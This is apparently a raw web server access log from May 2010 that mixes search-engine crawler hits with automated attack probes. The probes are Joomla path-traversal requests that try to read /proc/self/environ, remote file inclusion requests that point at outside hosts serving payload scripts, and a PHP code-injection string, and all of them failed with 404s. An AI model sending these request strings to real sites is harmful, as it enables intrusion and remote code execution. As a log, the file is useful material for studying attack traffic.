67.195.112.180 - - [15/May/2010:14:00:37 -0500] "GET /logs/?D=D HTTP/1.0" 200 5619 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [15/May/2010:14:00:45 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
193.147.173.214 - - [15/May/2010:14:00:54 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:00:54 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:00:54 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:04:12 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:04:12 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:04:13 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:04:49 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:04:50 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:04:50 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:05:07 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:05:07 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:05:07 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.199.194 - - [15/May/2010:14:05:47 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
120.29.168.99 - - [15/May/2010:14:06:30 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.digitalgoodsdirectory.com/googlecheckout/ini??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
120.29.168.99 - - [15/May/2010:14:06:30 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.digitalgoodsdirectory.com/googlecheckout/ini??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
61.135.134.108 - - [15/May/2010:14:06:36 -0500] "GET /logs/access_log.1271894400/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
61.135.134.108 - - [15/May/2010:14:06:36 -0500] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
61.135.134.108 - - [15/May/2010:14:06:37 -0500] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
61.135.134.108 - - [15/May/2010:14:07:47 -0500] "GET /logs/access_log.1271894400/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
61.135.134.108 - - [15/May/2010:14:07:48 -0500] "GET /index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
61.135.134.108 - - [15/May/2010:14:07:48 -0500] "GET /logs/index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.250.255.243 - - [15/May/2010:14:08:20 -0500] "GET /artwork/furniture.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
120.29.168.99 - - [15/May/2010:14:09:01 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.digitalgoodsdirectory.com/googlecheckout/ini??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
120.29.168.99 - - [15/May/2010:14:09:02 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.digitalgoodsdirectory.com/googlecheckout/ini??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
91.121.71.175 - - [15/May/2010:14:10:00 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:14:10:00 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
91.121.71.175 - - [15/May/2010:14:10:00 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.112.35.52 - - [15/May/2010:14:11:00 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.112.35.52 - - [15/May/2010:14:11:00 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.112.35.52 - - [15/May/2010:14:11:01 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:12:02 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:12:12 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
217.112.35.52 - - [15/May/2010:14:13:44 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
193.147.173.214 - - [15/May/2010:14:14:02 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:14:14:50 -0500] "GET /logs/access_log.1273104000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.236 - - [15/May/2010:14:15:10 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
120.29.168.99 - - [15/May/2010:14:16:08 -0500] "GET /logs/access_log.1273363200/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.digitalgoodsdirectory.com/googlecheckout/ini??? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
120.29.168.99 - - [15/May/2010:14:16:09 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.digitalgoodsdirectory.com/googlecheckout/ini??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
120.29.168.99 - - [15/May/2010:14:16:09 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.digitalgoodsdirectory.com/googlecheckout/ini??? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
112.78.8.20 - - [15/May/2010:14:16:29 -0500] "GET /logs/access_log.1271894400//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
112.78.8.20 - - [15/May/2010:14:16:29 -0500] "GET //index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
112.78.8.20 - - [15/May/2010:14:16:30 -0500] "GET /logs//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
112.78.8.20 - - [15/May/2010:14:17:06 -0500] "GET /logs/access_log.1271894400//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
112.78.8.20 - - [15/May/2010:14:17:06 -0500] "GET //index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
112.78.8.20 - - [15/May/2010:14:17:07 -0500] "GET /logs//index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.46.199.45 - - [15/May/2010:14:17:38 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.230 - - [15/May/2010:14:17:39 -0500] "GET /logs/access_log.1186790400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.43.201.70 - - [15/May/2010:14:19:53 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:19:53 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:19:53 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:19:54 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:19:54 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:19:55 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:19:56 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:19:56 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:19:57 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:21:12 -0500] "GET /logs/access_log.1273276800/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:14:21:20 -0500] "GET /logs/access_log.1271203200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
220.80.108.70 - - [15/May/2010:14:21:28 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.46.195.223 - - [15/May/2010:14:22:39 -0500] "GET /logs/access_log.1256860800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:14:26:00 -0500] "GET /logs/access_log.1273449600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.67.142 - - [15/May/2010:14:27:57 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://playlandia.crewlabs.net/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
91.121.67.142 - - [15/May/2010:14:27:57 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://playlandia.crewlabs.net/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
91.121.67.142 - - [15/May/2010:14:27:57 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://playlandia.crewlabs.net/id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.43.201.70 - - [15/May/2010:14:28:27 -0500] "GET /logs/access_log.1273276800/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.43.201.70 - - [15/May/2010:14:28:30 -0500] "GET /logs/access_log.1273276800/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:14:31:02 -0500] "GET //bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:02 -0500] "GET /logs//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:03 -0500] "GET /logs/access_log.1266710400//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:03 -0500] "GET /logs/access_log.1266192000//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:14:31:12 -0500] "GET /logs/access_log.1270771200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [15/May/2010:14:31:17 -0500] "GET /logs//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:17 -0500] "GET /logs/access_log.1266710400//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:18 -0500] "GET /logs/access_log.1266192000//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:18 -0500] "GET //bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:22 -0500] "GET /logs//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:22 -0500] "GET //bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:22 -0500] "GET /logs/access_log.1266710400//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:14:31:22 -0500] "GET /logs/access_log.1266192000//bbs//skin/rosun_comm2_gallery/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.46.195.230 - - [15/May/2010:14:33:39 -0500] "GET /logs/access_log.1205020800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.169.249.251 - - [15/May/2010:14:34:40 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:34:41 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:34:41 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
220.80.108.70 - - [15/May/2010:14:35:19 -0500] "GET /logs/access_log.1272844800//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
220.80.108.70 - - [15/May/2010:14:35:20 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
220.80.108.70 - - [15/May/2010:14:35:20 -0500] "GET /logs//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [15/May/2010:14:36:52 -0500] "GET /logs/access_log.1271462400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
211.169.249.251 - - [15/May/2010:14:37:14 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:37:15 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:37:15 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.195.112.180 - - [15/May/2010:14:39:53 -0500] "GET /?M=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.7.250 - - [15/May/2010:14:41:02 -0500] "GET /logs/access_log.1265155200////components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
69.175.7.250 - - [15/May/2010:14:41:02 -0500] "GET /logs////components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.175.7.250 - - [15/May/2010:14:41:02 -0500] "GET ////components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:14:43:25 -0500] "GET /logs/access_log.1176249600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.67.142 - - [15/May/2010:14:43:59 -0500] "GET /logs/access_log.1273363200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://playlandia.crewlabs.net/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.195.112.180 - - [15/May/2010:14:44:02 -0500] "GET /logs/access_log.1169251200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.226 - - [15/May/2010:14:44:09 -0500] "GET /logs/access_log.1221609600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.252.3.230 - - [15/May/2010:14:45:34 -0500] "GET /logs//init.php?API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.252.3.230 - - [15/May/2010:14:45:34 -0500] "GET //init.php?API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [15/May/2010:14:46:23 -0500] "GET /logs/access_log.1214697600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.177.125 - - [15/May/2010:14:48:52 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:48:52 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:48:53 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:14:49:58 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.177.125 - - [15/May/2010:14:50:08 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:50:09 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
114.108.177.125 - - [15/May/2010:14:50:10 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
207.46.13.47 - - [15/May/2010:14:50:11 -0500] "GET /logs/access_log.1161648000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.169.249.251 - - [15/May/2010:14:51:41 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:51:41 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:51:42 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:51:42 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
